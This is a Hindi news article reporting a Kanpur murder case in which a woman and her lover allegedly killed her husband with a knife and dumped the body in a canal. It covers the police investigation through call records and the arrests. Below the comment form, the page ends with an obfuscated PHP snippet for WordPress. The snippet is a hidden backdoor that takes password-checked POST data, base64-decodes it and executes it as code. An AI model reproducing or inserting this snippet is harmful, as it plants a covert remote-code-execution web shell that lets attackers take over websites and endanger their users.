पहले शराब पिलाई फिर चाकू से किए ताबड़तोड़ वार, हत्या कर शव नहर में फेंका, जानें मामला

Uttarakhand Press 7 October 2023: कानपुर के गुजैनी थाना क्षेत्र में आशनाई के चलते युवक ने प्रेमिका के पति को घर बुलाकर पहले शराब पिलाई फिर हत्या कर शव को रामगंगा निचली नहर में फेंक दिया था। इधर, प्रेमिका ने पुलिस को गुमराह करने के लिए रावतपुर थाने में पति की गुमशुदगी दर्ज करा दी। पुलिस ने पत्नी और प्रेमी को पकड़कर पूछताछ की तो मामला परत दर परत खुलता चला गया। पुलिस ने मामले में दोनों को गिरफ्तार कर वारदात का खुलासा कर दिया। हालांकि अभी शव बरामद नहीं हुआ है।

मूलरूप से फर्रुखाबाद के मोहम्मदाबाद नगला बहादुर गांव निवासी संजय (38) पत्नी सुमन व दो बच्चों के साथ रावतपुर के केशवपुरम के किराए के मकान में रहता था। सुमन गड़रियनपुरवा स्थित फैक्ट्री में काम करती थी, जबकि संजय दादानगर स्थित एक फैक्ट्री में काम करता था। एसीपी नौबस्ता अभिषेक कुमार पांडेय ने बताया कि रावतपुर पुलिस ने सुमन की तहरीर पर 30 सितंबर को संजय की गुमशुदगी दर्ज की थी।

रावतपुर पुलिस ने सुमन के नंबर की सीडीआर निकलवाई तो पता चला कि सुमन की ज्यादातर बातचीत गुजैनी गांव के मायापुरम बस्ती निवासी फैक्ट्रीकर्मी राजेश कुमार होती है। राजेश के नंबर की सीडीआर से पता चला कि 26 सितंबर को दोनों में बात हुई थी। पुलिस ने सुमन और राजेश से सख्ती से पूछताछ की तो दोनों ने हकीकत उगल दी। राजेश ने बताया कि जब से सुमन का पति गुरुग्राम से आया है वह मिल नहीं पा रहा था।

शव को बोरे में भरकर सामने नहर में फेंक दिया:
इसीलिए उसे रास्ते से हटाने के लिए करीब एक माह से हत्या की साजिश रच रहा था। दो दिन पहले सुमन को उसके मायके भेजा। बीते 26 सितंबर को संजय को घर बुलाकर शराब पिलाई फिर चाकू से ताबड़तोड़ वार कर हत्या कर दी। इससे पहले सुमन से हत्या के लिए पूछा, उसने हामी भरी थी। शव को बोरे में भरकर सामने नहर में फेंक दिया था। वहीं उसके कपड़े घर के पीछे गड्ढे में छिपाए थे। पिता की तहरीर पर पुलिस ने राजेश, सुमन और सुमन की मां के खिलाफ हत्या, साक्ष्य छिपाने की धारा में मुकदमा दर्ज कर उन्हें गिरफ्तार कर लिया। शनिवार को उन्हें जेल भेजा जाएगा।

पत्नी से विवाद के कारण चला गया था गुरुग्राम:
संजय के पिता तुलाराम ने बताया कि वर्ष 2004 में बेटे संजय की शादी कन्नौज के विशनूगढ़ बहादुरपुर निवासी सुमन से की थी। दोनों में अक्सर विवाद होता था। सुमन ने जहर देकर मारने का भी प्रयास किया था। पांच साल पहले संजय और सुमन के बीच सुलह हुई, तो दोनों रावतपुर केशवपुरम के किराए के मकान में रहने लगे थे। दोबारा विवाद शुरू होने पर संजय वापस गुरुग्राम काम करने चला गया।

कहा- इन्होंने हमेशा मदद की है, फिर दोनों में दोस्ती हो गई थी:
जबकि उनकी बहू सुमन बेटी के साथ रहकर गड़रियनपुरवा स्थित फैक्टरी में काम करने लगी थी। आरोप है कि वहां उसकी मुलाकात मूलरूप से मिर्जापुर निवासी राजेश कुमार से हो गई। बीते 12 जुलाई को संजय, सुमन के पास पहुंचा था। यहां वह दादानगर स्थित फैक्टरी में काम करने लगा। इस दौरान सुमन ने पति से राजेश की मुलाकात कराई और बताया कि इन्होंने हमेशा मदद की है। इससे दोनों में दोस्ती हो गई थी।

पुलिस को गुमराह करने के लिए गढ़ी कहानी:
तुलाराम ने बताया कि बेटे की फैक्ट्री से 26 सितंबर को फोन आया कि वह नहीं आया है। उसकी पत्नी संजय का वेतन लेकर चली गई। संजय का फोन न मिलने पर गुजरात में रहने वाले छोटे बेटे को 29 सितंबर को फोन कर बताया, तो उसने कहा कि भाभी का फोन आया था कि संजय ने 25 सितंबर को नशेबाजी के लिए उसकी साइकिल बेच दी है। तब से वह गायब है। यह सुनकर तुलाराम अगले दिन शाम को बहू के घर पहुंच गए, तब उसने बताया कि संजय फोन घर पर छोड़ गए हैं। फिर वह रावतपुर थाने गए, तो वहां बताया गया कि सुमन ने सुबह ही गुमशुदगी दर्ज कराई है।

जेसीबी से गड्ढा खोदकर बरामद किए कपड़े:
पुलिस को आशंका हुई कि हत्यारोपी ने शव छिपाया है। इसके लिए उन्होंने गुरुवार को राजेश के नीचे के एक कमरे में खोदाई कराई। वहां कुछ नहीं मिला, तो जेसीबी से घर के पीछे खोदाई कराई पर शव नहीं मिला। हालांकि कपड़े बरामद हो गए। हत्यारोपी ने खुद कबूला कि शव नहर में बहा दिया था। एसीपी ने बताया कि शव अभी बरामद नहीं हुआ है। आस पास के जिलों से संपर्क किया गया है।

राजेश के घर मिली थी संजय की लोकेशन:
रावतपुर पुलिस ने सीडीआर लोकेशन निकाली तो संजय की 22 तारीख को आखिरी लोकेशन गुजैनी में मिली। परिजन गुजैनी थाने पहुंचे। पुलिस को बताया कि बेटे संजय के गुजैनी निवासी राम उर्फ राजेश कुमार के उनकी बहू से अवैध संबंध हैं। इसके बाद हरकत में आई गुजैनी पुलिस ने मूलरूप से मिर्जापुर निवासी राम उर्फ राजेश राम के मायापुरम बस्ती स्थित घर पहुंची, जहां तहखाने में बने कमरे में खुदा हुआ मिला। आरोपी से सख्ती से पूछताछ हुई तो पूरी कहानी खुल गई।

तीन साल से थे दोनों में अवैध संबंध:
पूछताछ में राजेश ने बताया कि उसके और सुमन के बीच करीब तीन साल से अवैध संबंध थे। दो माह पूर्व संजय गुरुग्राम से लौट था। एक माह पहले संजय ने अपने घर में राजेश को सुमन के साथ आपत्तिजनक हालत में देख लिया था। इसके बाद सुमन ने उसे रास्ते से हटाने के लिए कहा तो संजय को बातों में फंसाकर दोस्ती कर ली। 26 सितंबर की दोपहर उसे अपने घर में शराब पिलाने के बाद चाकू से गला रेत कर हत्या कर दी। शव पास की झाड़ियों में छिपा दिया। रात्रि को घर के सामने बह रही नहर में फेंक दिया। वहीं चाकू व कपड़े कमरे में गाड़ दिए। पुलिस ने कपड़े और आला कत्ल बरामद कर लिया। शव की तलाश की जा रही है।

एक अंकल घर आए थे, लेकिन गए नहीं:
पुलिस ने राजेश के घर में किराये पर रहने वाले राम बहादुर, उसकी पत्नी अनीता, दो बेटियों अंजली और गुंजन से पूछताछ की। अंजली और गुंजन ने बताया कि 26 सितंबर की दोपहर को संजय और राजेश अंकल एक साथ घर तो आए थे लेकिन, संजय अंकल वापस जाने नहीं दिखे थे। दोपहर में राजेश उनसे ही फावड़ा मांगकर ले गया था।

Read Previous

उत्तराखंड के युवक की दुबई में संदिग्ध हालात में मौत, शव भारत नहीं पहुंचने से परिजनों का रो-रोकर बुरा हाल

Read Next

कुमाऊं में नैनीताल, अल्मोड़ा सीट पर जीत का रास्ता बनाएगा पीएम मोदी का दौरा, भाजपा साध रही एक साथ कई समीकर

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}